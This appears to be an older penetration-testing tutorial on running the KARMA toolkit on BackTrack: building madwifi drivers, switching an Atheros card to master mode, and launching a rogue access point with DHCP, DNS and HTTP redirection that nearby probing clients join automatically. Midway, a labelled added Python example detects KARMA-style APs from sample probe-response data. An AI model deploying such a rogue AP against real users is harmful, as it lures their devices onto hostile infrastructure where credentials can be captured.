THIS WORKS WITH ATHEROS-BASED CHIPSETS ONLY.
Project homepage: http://theta44.org/karma/index.html
“KARMA is a set of tools for assessing the security of wireless clients at multiple layers. Wireless sniffing tools discover clients and their preferred/trusted networks by passively listening for 802.11 Probe Request frames. From there, individual clients can be targeted by creating a Rogue AP for one of their probed networks (which they may join automatically) or using a custom driver that responds to probes and association requests for any SSID. Higher-level fake services can then capture credentials or exploit client-side vulnerabilities on the host.” -http://theta44.org
First of all, install the latest madwifi snapshot from here:
http://snapshots.madwifi.org/madwifi-trunk/madwifi-trunk-r3813-20080720.tar.gz
bt ~ # tar -zxvf madwifi-trunk-r3813-20080720.tar.gz
bt ~ # cd madwifi-trunk-r3813-20080720
bt ~ # make && make install
bt ~ # ln -s /sbin/iwconfig /usr/sbin/iwconfig
bt ~ # ln -s /sbin/iwpriv /usr/sbin/iwpriv
bt ~ # ln -s /sbin/iwevent /usr/sbin/iwevent
bt ~ # airmon-ng start ath0
bt ~ # airmon-ng start wifi0
Putting the card into monitor mode (above). Next, destroy ath0 and recreate it in master (AP) mode:
bt ~ # wlanconfig ath0 destroy
bt ~ # wlanconfig ath0 create wlandev wifi0 wlanmode master
Change to the karma directory.
karma.xml – “Runs a rogue base station with DHCP, DNS and HTTP services. The HTTP service re-directs all requests to the ExampleWebExploit module that displays a simple HTML page. This page can be replaced with something that informs the user that their wireless settings are insecure and that it may be a violation of corporate policy etc” -http://theta44.org
bt karma # bin/monitor-mode.sh ath0
bt karma # (cd ./src/ && make) && ./src/karma ath0
bt karma # bin/karma etc/karma.xml
Now that the rogue services are started, any probing client will connect to KARMA on our machine, whichever SSID its machine chooses to probe for.
iwconfig output showing ath0 working as the rogue AP; we can see the BSSID of the rogue AP.
We can see our fake AP is working now and broadcasting its BSSID, and other clients probing for a legitimate AP automatically connect to our rogue AP.
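The behaviour just described is also what gives a KARMA-style AP away on the air: a legitimate access point answers Probe Requests only for the SSID(s) it actually serves, while a KARMA-style AP answers probes for any SSID, so a single BSSID is seen responding with many different SSIDs in a short time. The following is an added detection example written for this page; it is not code from the original post or from the KARMA project. It runs over a constructed list of Probe Response observations (the MAC addresses and SSIDs are made up), and the window size and SSID threshold are assumed tuning values, not figures from the page.

```python
# Added example (not part of the original post or of the KARMA project):
# flag access points that answer probes for many different SSIDs, which is
# the on-air signature of a KARMA-style rogue AP.
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProbeResponse:
    """Minimal view of one Probe Response frame: when, from which BSSID, for which SSID."""
    ts: float      # capture timestamp in seconds
    bssid: str     # transmitter / BSSID, lower-case MAC
    ssid: str      # SSID element carried in the response


# Constructed sample observations (not a real capture). Addresses are
# locally administered placeholders; SSIDs are invented.
SAMPLE_FRAMES = [
    # legitimate corporate AP answering only for its own SSID
    ProbeResponse(0.0, "02:00:00:00:00:01", "corp-wifi"),
    ProbeResponse(1.5, "02:00:00:00:00:01", "corp-wifi"),
    ProbeResponse(3.0, "02:00:00:00:00:01", "corp-wifi"),
    # KARMA-style AP answering whatever SSIDs nearby clients probe for
    ProbeResponse(0.2, "02:00:00:00:00:aa", "corp-wifi"),
    ProbeResponse(0.4, "02:00:00:00:00:aa", "linksys"),
    ProbeResponse(0.9, "02:00:00:00:00:aa", "Starbucks WiFi"),
    ProbeResponse(1.1, "02:00:00:00:00:aa", "home-net"),
    ProbeResponse(2.7, "02:00:00:00:00:aa", "attwifi"),
    # a dual-SSID AP (guest + staff) is normal and must not be flagged
    ProbeResponse(0.5, "02:00:00:00:00:02", "guest"),
    ProbeResponse(2.0, "02:00:00:00:00:02", "staff"),
]


def detect_promiscuous_responders(frames, window_s=10.0, ssid_threshold=3):
    """Return {bssid: sorted list of all SSIDs it answered for} for every BSSID
    that answered probes for more than `ssid_threshold` distinct SSIDs within
    any `window_s`-second window.

    `window_s` and `ssid_threshold` are assumed tuning values for this example;
    a real deployment should baseline them against its own multi-SSID APs.
    """
    by_bssid = defaultdict(list)
    for f in frames:
        by_bssid[f.bssid].append(f)

    flagged = {}
    for bssid, obs in by_bssid.items():
        obs.sort(key=lambda f: f.ts)
        start = 0
        # sliding window over the time-ordered observations of this BSSID
        for end in range(len(obs)):
            while obs[end].ts - obs[start].ts > window_s:
                start += 1
            distinct = {f.ssid for f in obs[start:end + 1]}
            if len(distinct) > ssid_threshold:
                flagged[bssid] = sorted({f.ssid for f in obs})
                break
    return flagged


def report(frames):
    """One human-readable line per flagged BSSID, suitable for an alert body."""
    lines = []
    for bssid, ssids in sorted(detect_promiscuous_responders(frames).items()):
        lines.append(f"{bssid} answered probes for {len(ssids)} SSIDs: {', '.join(ssids)}")
    return lines


if __name__ == "__main__":
    for line in report(SAMPLE_FRAMES):
        print(line)
```

In practice the ProbeResponse records would be fed from a monitor-mode capture (for example the BSSID, SSID and timestamp fields exported by a packet dissector) rather than from the constructed list; the threshold is deliberately above two so that ordinary guest/staff dual-SSID access points are not reported.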
karma-scan.xml – “Attempts to find insecure wireless clients that will associate to rogue network and possibly obtain IP address via DHCP”. -http://theta44.org
bt karma # bin/karma etc/karma-scan.xml
karma-scan.xml
This tool has a layered attack approach. I am still working on it so that we can launch more attacks, like Nmap scanning and Metasploit to exploit the known vulnerabilities.